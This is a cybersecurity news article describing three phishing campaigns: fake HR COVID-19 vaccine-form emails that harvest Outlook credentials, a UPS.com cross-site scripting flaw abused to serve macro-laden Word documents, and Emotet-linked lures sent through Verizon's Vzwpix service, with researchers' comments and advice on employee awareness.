A patient receives a Pfizer-BioNTech COVID-19 vaccine last May from a nurse at the University of Miami's pediatric mobile unit. (Photo by Joe Raedle/Getty Images)

A trio of phishing reports are shedding light on the eclectic arsenal of techniques that cybercriminals have at their disposal, including using current events such as vaccine news to craft timely and urgent lures, as well as exploiting legitimate services and platforms, like Verizon’s multimedia messaging service and the UPS.com website.

Scammers pose as HR deptment seeking vaccine documents

Inky this week observed a spate of phishing activity this summer in which cybercriminals were pretending to be the HR department, asking email recipients to submit a COVID-19 vaccination form.

The pandemic has been a rich source of email lures from the beginning, especially because victims are more likely to click on a link or provide personal information when confronted with an urgent issue that sparks fear and uncertainty. The recent push by various government bodies to encourage vaccinations and mandating of vaccinations by corporate employers such as Google, Disney and Walmart are just the latest developments in the coronavirus saga that bad actors are seizing upon.

“I call it surfing the news cycle,” said Roger Kay, vice president of security strategy at Inky. “First it was: ‘COVID – is it dangerous or not?’ And then there was: 'Vaccines – are they dangerous or not?' It was policies for work at home, policies for returning to the office. So every, every turn of the screw, they have a new lure that they can put together. And that's part of how they camouflage the lures.”

Kay expects future phishing campaigns will continue the trend, exploiting other developments like the Lambda variant, booster shots, and back-to-school policies. “Since COVID, there’s been this deep-seated anxiety in the entire society that’s causing everyone disruption and so I think a lot of people are looking to do anything to assuage that anxiety. Like: ‘I need to fix this. Is there some concrete thing I can do to make my life less uncertain?’ And so, the answer is ‘Click this blue big blue button – it'll make you feel safe.’”

According to Inky, the perpetrators sent the phishing emails from hijacked, legitimate external emails accounts. They way, the emails would pass standard email authentication protections such as SPF, DKIM and DMARC.

One sample fake HR email from this latest campaign stated, “We are learning of new and strict requirements from the County with regards to tracking Covid vaccinations. All employees are Required to complete the Covid Vaccinations form and return it to HR as soon as possible.” The email also imposes a same-day deadline and floats the possibility of serious fines – a tactic designed to make you click the link before thinking it through.

But that link actually takes you to a website designed to look like a Microsoft Outlook web app login page so the cybercriminals can steal your username and password. A second form then asks for additional personal information.

In what Kay called a final “coup de grace,” the attackers then redirect victims to a COVID-19 vaccine form found on government website for California’s Santa Clara County. It’s a final attempt to feign authenticity so that the victim “doesn't feel cognitive dissonance until later,” and the scammer “has more time, essentially, to escape out the side door without being discovered.”

“It’s frankly not necessary in this case – they already got your credentials – but it is kind of like putting the victim back to sleep,” he said.

UPS.com phish leverages XSS vulnerability

Researcher Daniel Gallagher reported via tweet this week that he encountered “one of the best phishing emails I have seen in a long time” after spotting a campaign that exploited a cross-site scripting flaw in UPS.com in order to distribute malicious Word documents disguised as invoices.

As reported by BleepingComputer, cybercriminals crafted a lookalike UPS email with a delivery tracking number linking to UPS' actual site. Clicking on the link leads to the vulnerability, which enables malicious JavaScript injections into the browser, so that malicious actors can modify the UPS.com web page to look as if a legitimate download is about to occur.

Even though the adversaries actually use a remote Cloudflare worker to alter the page and deliver the weaponized doc, the victims would likely think the file was actually sourced from UPS.com. The downloaded document must then have its malicious macros enabled in order to drop the final payload.

David Pickett, senior cybersecurity analyst at Zix|AppRiver, referred to this incident as a case of “living off the land phishing, which occurs when cybercriminals abuse otherwise legitimate services to blend in with the crowd and mask the true nature of their message.”

“The Zix threat research team has seen a huge uptick in this type of phishing attack over the past few years. The attacks vary greatly in theme and brand being impersonated. However, more attackers have begun posing as a shipping service since the pandemic began, given that consumers are spending less time in stores and shopping more online.”

SC Media reached out to UPS and Daniel Gallagher to confirm if the vulnerability was repaired. A UPS spokesperson subsequently confirmed that the issue was resolved.

Tricksters Text Emails to Targets Using Vzwpix

Cofense on Thursday revealed in a blog post that analysts within its Phishing Defense Center studied the targeting patterns of a cybercriminal campaign that’s been using Verizon’s multimedia messaging service, Vzwpix, as a way to text phishing content to recipients’ email inboxes.

By sending the emails this way, the threat actors can “mass deliver texts that come from a phone number, but not show the name of the sender,” the report states. “This can leave recipients guessing who sent them if they do not recognize the number.” And in their uncertainty, the victim may assume incorrectly that the communication is from a known or trusted source.

Cofense said it received hundreds of reports of this scam in recent weeks, although the company noted that their research turned up examples of this activity taking place over the last two years. Blog author Zachary Bailey, threat analyst at Cofense, told SC Media that the campaign in question was specifically tied to Emotet malware.

Other telecom companies offer a similar phone-to-email messaging services as Vzwpix, and according to Bailey, Cofense receives frequent reports on potentially malicious activity involving them as well. “A majority of these have been benign, but the recent phishing campaign shows they can still be a vector that exploits trust in a service employees use,” said Bailey.

“Our customers in the manufacturing and industrial sectors frequently utilize these [services] to send images from the field to their co-workers,” Bailey continued. Consequently, “if they received a lure related to their line of work, they might be tempted to trust it.”

The campaign examined by Cofense analysts used the concept of an ACH transfer as a lure and also includes a link that purportedly leads to a new voicemail message. The link avoids secure email gateway protections, the blog post explains, by leveraging a legitimate survey application – designed to look like a Microsoft OneDrive login page – that was created via the Alchemer survey form builder.

Bailey said it is up to organizations to consider whether or not services like Vzwpix “should be treated as trusted services by default,” especially because for many companies, “services like this are not critical to daily operations, and should be viewed with more scrutiny.”

Bailey also said businesses should train employees to be aware of abuse of SMS-to-email services. Improving your workers’ cybersecurity awareness – including reviewing the latest phishing trends and telltale warning signs of a scam – also would help with the other aforementioned campaigns as well.